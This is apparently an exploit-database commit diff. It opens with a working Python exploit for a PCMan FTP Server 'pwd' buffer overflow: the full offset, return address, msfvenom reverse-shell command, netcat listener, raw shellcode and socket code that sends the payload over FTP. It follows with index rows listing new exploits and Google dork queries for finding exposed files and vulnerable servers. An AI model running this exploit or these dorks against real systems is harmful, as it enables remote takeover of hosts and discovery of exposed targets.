#offset = 2007
#badchars=\x00\x0a\x0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
#nc -nvlp 4444
overflow = (
"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"
"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"
"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"
"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"
"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"
"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"
"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"
"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
"\xd7")
shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow
# Change IP/Port as required
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "\nSending evil buffer..."
s.connect(('192.168.146.135',21))
data = s.recv(1024)
s.send('USER anonymous' +'\r\n')
data = s.recv(1024)
s.send('PASS anonymous\r\n')
s.send('pwd ' + shellcode + '\r\n')
s.close()
print "\nExploit completed successfully!."
except:
print "Could not connect to FTP!"

12
files_exploits.csv
View file

@ -3036,6 +3036,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51053,exploits/hardware/dos/51053.txt,"DLink DIR 819 A1 - Denial of Service",2023-03-25,whokilleddb,dos,hardware,,2023-03-25,2023-03-25,0,CVE-2022-40946,,,,,
32305,exploits/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",dos,hardware,,2008-08-29,2014-03-17,1,,,,,,https://www.securityfocus.com/bid/30919/info
19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware,,1999-09-27,2012-07-01,1,CVE-1999-1533;OSVDB-13556,,,,,https://www.securityfocus.com/bid/665/info
51774,exploits/hardware/dos/51774.txt,"Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS",2024-02-02,LiquidWorm,dos,hardware,,2024-02-02,2024-02-02,0,,,,,,
18688,exploits/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",dos,hardware,,2012-03-31,2012-03-31,1,OSVDB-80815;OSVDB-80814;CVE-2012-0407;CVE-2012-0406,,,,,http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
18734,exploits/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",dos,hardware,,2012-04-12,2012-04-12,1,OSVDB-81147;OSVDB-81146;CVE-2012-2277;CVE-2012-2276,,,,,
21791,exploits/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",dos,hardware,,2002-09-13,2012-10-07,1,CVE-2002-1501;OSVDB-10063,,,,,https://www.securityfocus.com/bid/5703/info
@ -4337,6 +4338,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,,
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,,
48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,,
51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51775,exploits/hardware/webapps/51775.txt,"Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51773,exploits/hardware/webapps/51773.py,"Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
42252,exploits/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",webapps,hardware,,2017-06-26,2017-06-26,0,,,,,,
47623,exploits/hardware/webapps/47623.txt,"eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7255,,,,,
47622,exploits/hardware/webapps/47622.py,"eMerge E3 1.00-06 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7257,,,,,
@ -4898,6 +4904,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,,
51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,,
43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,,
51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",webapps,hardware,,2014-08-03,2016-09-12,0,OSVDB-109840;OSVDB-109839,,,,,
46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,,2019-05-21,2019-05-21,0,CVE-2019-12195,"Cross-Site Scripting (XSS)",,,,
44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,,2018-05-28,2018-05-28,0,,,,,,
@ -22021,6 +22029,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php,,2007-04-24,2016-09-30,1,OSVDB-35387;CVE-2007-2324,,,,http://www.exploit-db.comjulma.zip,
2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php,,2006-10-22,,1,OSVDB-35737;CVE-2006-6635,,,,,
29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php,,2013-11-25,2013-11-25,0,CVE-2013-6618;OSVDB-92227,,,,,
51776,exploits/php/webapps/51776.py,"Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)",2024-02-02,whiteOwl,webapps,php,,2024-02-02,2024-02-02,0,,,,,,
4781,exploits/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,webapps,php,,2007-12-23,,1,OSVDB-52931,,,,,http://www.bugreport.ir/?/23
28582,exploits/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php,,2006-09-15,2013-09-28,1,CVE-2006-4874;OSVDB-31529,,,,,https://www.securityfocus.com/bid/20048/info
28584,exploits/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php,,2006-09-15,2013-09-28,1,CVE-2006-4874;OSVDB-31531,,,,,https://www.securityfocus.com/bid/20048/info
@ -23630,6 +23639,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip,
27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,,
51766,exploits/php/webapps/51766.txt,"mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page",2024-02-02,"Astik Rawat",webapps,php,,2024-02-02,2024-02-02,0,,,,,,
51670,exploits/php/webapps/51670.txt,"mooSocial 3.1.8 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4173,,,,,
45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,,
9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,webapps,php,,2009-07-09,,1,OSVDB-55796;CVE-2009-3713,,,,,
@ -44654,6 +44664,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows,,2009-09-12,2013-09-25,1,CVE-2006-5034;OSVDB-28808,,,,,https://www.securityfocus.com/bid/19958/info
4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,,2007-10-11,,1,OSVDB-43481;CVE-2007-5446,,,,,
39662,exploits/windows/remote/39662.rb,"PCMan FTP Server - 'PUT' Buffer Overflow (Metasploit)",2016-04-05,Metasploit,remote,windows,21,2016-04-05,2016-10-31,1,OSVDB-94624,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
51767,exploits/windows/remote/51767.py,"PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow",2024-02-02,"Waqas Ahmed Faroouqi",remote,windows,,2024-02-02,2024-02-02,0,,,,,,
26495,exploits/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,remote,windows,,2013-06-30,2013-06-30,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
40704,exploits/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Remote Buffer Overflow",2016-11-03,Cybernetic,remote,windows,,2016-11-03,2016-11-03,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-03-at-182757.png,http://www.exploit-db.comPCMan.7z,
40670,exploits/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Remote Buffer Overflow",2016-10-31,ScrR1pTK1dd13,remote,windows,,2016-10-31,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-10-31-at-233222.png,http://www.exploit-db.comPCMan.7z,
@ -45378,6 +45389,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1374,exploits/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution",2005-12-15,"Mariano Nuñez",remote,windows,,2005-12-14,,1,OSVDB-21746;CVE-2005-4270,,,,,
23514,exploits/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Remote Buffer Overflow",2004-01-04,"Peter Winter-Smith",remote,windows,,2004-01-04,2012-12-20,1,CVE-2004-1784;OSVDB-3312,,,,,https://www.securityfocus.com/bid/9351/info
7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,,
51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,,
16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,,
3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz,
37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,,

Can't render this file because it is too large.

54
ghdb.xml
View file

@ -32887,6 +32887,19 @@ Dxtroyer</textualDescription>
<date>2017-06-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>8401</id>
<link>https://www.exploit-db.com/ghdb/8401</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Started by upstream project&quot; ext:txt</shortDescription>
<textualDescription>Author: nadirb19
Google Dork: &quot;Started by upstream project&quot; ext:txt</textualDescription>
<query>&quot;Started by upstream project&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;Started by upstream project&quot; ext:txt</querystring>
<edb></edb>
<date>2024-02-02</date>
<author>nadirb19</author>
</entry>
<entry>
<id>4162</id>
<link>https://www.exploit-db.com/ghdb/4162</link>
@ -34966,6 +34979,20 @@ Twitter: https://www.twitter.com/la_usch
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>8400</id>
<link>https://www.exploit-db.com/ghdb/8400</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:java intext:&quot;executeUpdate&quot;</shortDescription>
<textualDescription># Exploit Title: Sensitive data in java files
# Google Dork: ext:java intext:&quot;executeUpdate&quot;
# Exploit Author: BULLETMHS</textualDescription>
<query>ext:java intext:&quot;executeUpdate&quot;</query>
<querystring>https://www.google.com/search?q=ext:java intext:&quot;executeUpdate&quot;</querystring>
<edb></edb>
<date>2024-02-02</date>
<author>BULLETMHS</author>
</entry>
<entry>
<id>7917</id>
<link>https://www.exploit-db.com/ghdb/7917</link>
@ -116819,6 +116846,19 @@ Linkedin: https://www.linkedin.com/in/hemantsolo/
<date>2020-06-08</date>
<author>Hemant Patidar</author>
</entry>
<entry>
<id>8402</id>
<link>https://www.exploit-db.com/ghdb/8402</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Installation Wizard - PowerCMS v2&quot;</shortDescription>
<textualDescription>Author: nadirb19
Dork: intitle:&quot;Installation Wizard - PowerCMS v2&quot;</textualDescription>
<query>intitle:&quot;Installation Wizard - PowerCMS v2&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Installation Wizard - PowerCMS v2&quot;</querystring>
<edb></edb>
<date>2024-02-02</date>
<author>nadirb19</author>
</entry>
<entry>
<id>753</id>
<link>https://www.exploit-db.com/ghdb/753</link>
@ -116940,6 +116980,20 @@ Demewoz Agegnehu | Sabean Technology | https://sabtechx.com</textualDescription>
<date>2020-10-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8403</id>
<link>https://www.exploit-db.com/ghdb/8403</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Welcome to iTop version&quot; wizard</shortDescription>
<textualDescription>Author: nadirb19
Dork: intitle:&quot;Welcome to iTop version&quot; wizard
</textualDescription>
<query>intitle:&quot;Welcome to iTop version&quot; wizard</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to iTop version&quot; wizard</querystring>
<edb></edb>
<date>2024-02-02</date>
<author>nadirb19</author>
</entry>
<entry>
<id>6419</id>
<link>https://www.exploit-db.com/ghdb/6419</link>